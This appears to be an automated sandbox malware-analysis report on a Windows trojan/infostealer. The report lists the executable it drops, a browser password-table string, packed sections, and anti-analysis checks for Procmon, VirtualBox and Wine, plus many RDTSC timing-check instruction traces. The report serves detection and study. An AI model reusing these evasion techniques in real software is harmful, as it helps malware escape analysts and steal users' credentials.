Source: file.exe, 00000000.00000003.2236216317.0000000006461000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2249678293.0000000006374000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2238490883.0000000006358000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223655318.000000000630B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218612684.0000000006094000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217729589.00000000062CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2224420371.000000000623B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248094046.0000000006232000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219880350.000000000637A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2229371483.0000000006236000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220469866.0000000006232000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235423861.000000000623D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220854134.00000000062E4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222228481.00000000063A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223332767.0000000006306000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2236003909.000000000634F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2216099204.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223531134.0000000006236000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2221192080.00000000062E7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223012136.00000000063C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2229971250.000000000640E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220095626.00000000062F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234932499.0000000006332000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2236477132.000000000623D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2230931394.0000000006238000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222854969.00000000062F4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2245593002.0000000006365000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234185301.000000000633E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253092496.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222701181.000000000623B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2231984789.000000000642F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234761968.0000000006236000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247217329.00000000064B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2233949392.0000000006241000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218720755.0000000006237000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247951472.00000000064A0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2227764552.0000000006238000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2226303572.0000000006313000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2233546782.0000000006333000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217588128.000000000623B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2228075555.0000000006318000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2221012388.0000000006232000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235648092.0000000006346000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223193509.0000000006238000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2245796475.0000000006233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9981264694357367
Source: file.exe Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/2
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\02FQBW3AYVFKS8DMY3O.exe.log
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Mutant created: NULL
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000003.2097251680.0000000005E42000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005D98000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 36%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe String found in binary or memory: zRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNe
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe "C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Section loaded: sspicli.dll
Source: file.exe Static file information: File size 3000320 > 1048576
Source: file.exe Static PE information: Raw size of wbrzvzgu is bigger than: 0x100000 < 0x2b1200
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 02FQBW3AYVFKS8DMY3O.exe, 00000003.00000003.2276067053.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, 02FQBW3AYVFKS8DMY3O.exe, 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.820000.0.unpack :EW;.rsrc :W;.idata :W;wbrzvzgu:EW;gwyfrlto:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wbrzvzgu:EW;gwyfrlto:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Unpacked PE file: 3.2.02FQBW3AYVFKS8DMY3O.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W;lckjivxs:EW;pqfzdyos:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x2ea059 should be: 0x2e7f27
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: real checksum: 0x2a263f should be: 0x2a418d
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: wbrzvzgu
Source: file.exe Static PE information: section name: gwyfrlto
Source: file.exe Static PE information: section name: .taggant
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name:
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name: .idata
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name: lckjivxs
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name: pqfzdyos
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC62A push ss; iretd 0_3_017FC63B
Source: file.exe Static PE information: section name: entropy: 7.982977832144119
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name: entropy: 7.778035325115451
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87EA17 second address: 87EA27 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F661D451436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A00C74 second address: A00C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E8Ah 0x00000009 popad 0x0000000a jnl 00007F661CE75E8Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FFD1F second address: 9FFD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FFD23 second address: 9FFD2D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F661CE75E86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FFD2D second address: 9FFD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FFE9B second address: 9FFED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jbe 00007F661CE75E86h 0x00000013 jmp 00007F661CE75E91h 0x00000018 jmp 00007F661CE75E91h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FFED1 second address: 9FFEE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F661D451436h 0x0000000a jnl 00007F661D451436h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FFEE1 second address: 9FFEE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A00345 second address: A00349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02B68 second address: 87EA17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 1F2698EAh 0x0000000d push dword ptr [ebp+122D0781h] 0x00000013 movzx esi, cx 0x00000016 sbb di, F69Eh 0x0000001b call dword ptr [ebp+122D2E41h] 0x00000021 pushad 0x00000022 add dword ptr [ebp+122D29D2h], edi 0x00000028 xor eax, eax 0x0000002a cmc 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f mov dword ptr [ebp+122D29D2h], edx 0x00000035 mov dword ptr [ebp+122D38BEh], eax 0x0000003b jmp 00007F661CE75E8Dh 0x00000040 mov esi, 0000003Ch 0x00000045 pushad 0x00000046 jmp 00007F661CE75E8Dh 0x0000004b mov dh, cl 0x0000004d popad 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 cld 0x00000053 clc 0x00000054 lodsw 0x00000056 mov dword ptr [ebp+122D2D4Fh], esi 0x0000005c cld 0x0000005d add eax, dword ptr [esp+24h] 0x00000061 mov dword ptr [ebp+122D29D2h], esi 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b xor dword ptr [ebp+122D2A26h], edx 0x00000071 nop 0x00000072 jp 00007F661CE75E94h 0x00000078 push eax 0x00000079 push edx 0x0000007a push edx 0x0000007b pop edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02BC2 second address: A02C4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F661D451446h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F661D451438h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b sub dword ptr [ebp+122D232Bh], edi 0x00000031 push 00000000h 0x00000033 call 00007F661D451441h 0x00000038 jmp 00007F661D45143Dh 0x0000003d pop esi 0x0000003e call 00007F661D451441h 0x00000043 movzx edi, bx 0x00000046 pop edi 0x00000047 push 1C332BE6h 0x0000004c pushad 0x0000004d pushad 0x0000004e push edi 0x0000004f pop edi 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02C4E second address: A02CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F661CE75E8Ch 0x0000000b popad 0x0000000c xor dword ptr [esp], 1C332B66h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F661CE75E88h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d jmp 00007F661CE75E90h 0x00000032 push 00000003h 0x00000034 mov cx, 598Fh 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D2390h], ecx 0x00000040 push 00000003h 0x00000042 mov esi, dword ptr [ebp+122D2E0Bh] 0x00000048 mov dword ptr [ebp+122D2780h], edx 0x0000004e call 00007F661CE75E89h 0x00000053 pushad 0x00000054 push ebx 0x00000055 pushad 0x00000056 popad 0x00000057 pop ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02CC1 second address: A02CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02CC5 second address: A02CDB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F661CE75E8Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02CDB second address: A02D01 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F661D45143Bh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F661D45143Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02D01 second address: A02D11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02D11 second address: A02D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02D16 second address: A02D42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661CE75E96h 0x00000008 jns 00007F661CE75E86h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02DFF second address: A02E1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451446h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02E1F second address: A02E56 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 jl 00007F661CE75E98h 0x0000000e jmp 00007F661CE75E92h 0x00000013 push 00000000h 0x00000015 mov esi, dword ptr [ebp+122D369Ah] 0x0000001b call 00007F661CE75E89h 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pushad 0x00000024 popad 0x00000025 pop edi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02E56 second address: A02E5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02E5B second address: A02E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F661CE75E90h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F661CE75E95h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0308B second address: A030A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A030A0 second address: A03138 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 7E1C1DC5h 0x0000000f pushad 0x00000010 mov dh, E5h 0x00000012 xor ecx, dword ptr [ebp+122D37DEh] 0x00000018 popad 0x00000019 push 00000003h 0x0000001b call 00007F661CE75E96h 0x00000020 pop ecx 0x00000021 push 00000000h 0x00000023 jl 00007F661CE75E8Ch 0x00000029 add edi, 32FE15BAh 0x0000002f push 00000003h 0x00000031 sub si, E6F8h 0x00000036 push B4596807h 0x0000003b jmp 00007F661CE75E8Fh 0x00000040 xor dword ptr [esp], 74596807h 0x00000047 mov dword ptr [ebp+122D2DB8h], edi 0x0000004d add dword ptr [ebp+122D2337h], edx 0x00000053 lea ebx, dword ptr [ebp+12457AC4h] 0x00000059 push esi 0x0000005a jnc 00007F661CE75E88h 0x00000060 pop esi 0x00000061 mov si, B8BCh 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F661CE75E92h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A13DE3 second address: A13DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A13DE9 second address: A13DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A13DF2 second address: A13DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23CF5 second address: A23CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
